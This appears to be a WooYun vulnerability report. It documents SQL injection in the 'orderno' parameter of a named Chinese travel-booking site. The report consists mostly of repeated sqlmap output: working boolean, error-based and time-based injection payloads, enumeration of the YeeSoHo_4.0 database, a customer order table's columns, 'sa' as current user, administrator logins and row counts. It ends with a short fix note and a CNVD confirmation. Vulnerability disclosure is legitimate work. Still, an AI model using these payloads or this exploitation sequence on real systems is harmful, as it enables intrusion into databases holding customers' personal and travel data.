Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: YeeSoHo_4.0
Table: V4_Ysta_SubsOrderNo
[70 columns]
+------------------+-----------+
| Column | Type |
+------------------+-----------+
| AcceptSt | char |
| Address | nvarchar |
| AirLines | varchar |
| ArrivalDate | varchar |
| AuditingDt | datetime |
| AuditingMan | varchar |
| AuditingSt | char |
| BalanceMoney | money |
| BelongCustomer | int |
| BoardPoint | varchar |
| BookingMan | varchar |
| Carrier | varchar |
| Carriers | varchar |
| CheckSt | char |
| CreateDt | datetime |
| CustomerName | varchar |
| CustomerNo | varchar |
| CustomerType | char |
| DealDepID | int |
| DepartureDt | datetime |
| DepID | int |
| DepType | char |
| DiffDt | int |
| FlowStatus | char |
| FlowStep | varchar |
| FltDate | varchar |
| FltDateTime | datetime |
| Gain | money |
| GathingDt | datetime |
| GathingMan | varchar |
| GathingSt | char |
| InsMoney | money |
| InsNetPrice | money |
| InvoinceMoney | float |
| InvoinceTitle | nvarchar |
| IsCancel | char |
| IsDomc | char |
| IsSelected | int |
| LinkerID | nvarchar |
| ModifyDt | datetime |
| ModifyTag | timestamp |
| NetPrice | money |
| OffPoint | varchar |
| OID | int |
| OpID | varchar |
| OrderNo | varchar |
| OrderSource | varchar |
| PayType | varchar |
| PNR | varchar |
| Pnrs | varchar |
| PointGain | money |
| PrintAddr | varchar |
| PrintAddrName | varchar |
| Prompt | datetime |
| ProviderCustomer | int |
| PsrName | nvarchar |
| RefundSt | varchar |
| Remark | nvarchar |
| SalePointID | int |
| SalePointName | varchar |
| SalesID | varchar |
| SendStatus | char |
| SendTktDepID | int |
| SendTktDepName | varchar |
| SendTktsTypeCode | varchar |
| SubsOrderNo | varchar |
| SuspendedSt | char |
| TicketMan | varchar |
| TicketSt | char |
| UserID | varchar |
+------------------+-----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: YeeSoHo_4.0
Table: V4_Ysta_SubsOrderNo
[70 columns]
+------------------+-----------+
| Column | Type |
+------------------+-----------+
| AcceptSt | char |
| Address | nvarchar |
| AirLines | varchar |
| ArrivalDate | varchar |
| AuditingDt | datetime |
| AuditingMan | varchar |
| AuditingSt | char |
| BalanceMoney | money |
| BelongCustomer | int |
| BoardPoint | varchar |
| BookingMan | varchar |
| Carrier | varchar |
| Carriers | varchar |
| CheckSt | char |
| CreateDt | datetime |
| CustomerName | varchar |
| CustomerNo | varchar |
| CustomerType | char |
| DealDepID | int |
| DepartureDt | datetime |
| DepID | int |
| DepType | char |
| DiffDt | int |
| FlowStatus | char |
| FlowStep | varchar |
| FltDate | varchar |
| FltDateTime | datetime |
| Gain | money |
| GathingDt | datetime |
| GathingMan | varchar |
| GathingSt | char |
| InsMoney | money |
| InsNetPrice | money |
| InvoinceMoney | float |
| InvoinceTitle | nvarchar |
| IsCancel | char |
| IsDomc | char |
| IsSelected | int |
| LinkerID | nvarchar |
| ModifyDt | datetime |
| ModifyTag | timestamp |
| NetPrice | money |
| OffPoint | varchar |
| OID | int |
| OpID | varchar |
| OrderNo | varchar |
| OrderSource | varchar |
| PayType | varchar |
| PNR | varchar |
| Pnrs | varchar |
| PointGain | money |
| PrintAddr | varchar |
| PrintAddrName | varchar |
| Prompt | datetime |
| ProviderCustomer | int |
| PsrName | nvarchar |
| RefundSt | varchar |
| Remark | nvarchar |
| SalePointID | int |
| SalePointName | varchar |
| SalesID | varchar |
| SendStatus | char |
| SendTktDepID | int |
| SendTktDepName | varchar |
| SendTktsTypeCode | varchar |
| SubsOrderNo | varchar |
| SuspendedSt | char |
| TicketMan | varchar |
| TicketSt | char |
| UserID | varchar |
+------------------+-----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
database management system users privileges:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] distributor_admin (administrator)
[*] ReplicationYeesoho
[*] sa (administrator)
[*] yeesoho (administrator)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
SELECT COUNT(*) FROM Change_SubsOrderNo_BK : '1'
SELECT COUNT(*) FROM [1]:
SELECT COUNT(*) FROM YeeSoHo_4.0 [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
SELECT COUNT(*) FROM Change_SubsOrderNo_BK : '1'
SELECT COUNT(*) FROM V4_YW_RefundAirOrders_OrderNo: '270414'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

修复方案:

过滤好字符 并且增加验证权限

版权声明:转载请注明来源 JiuShao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-03 15:07

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论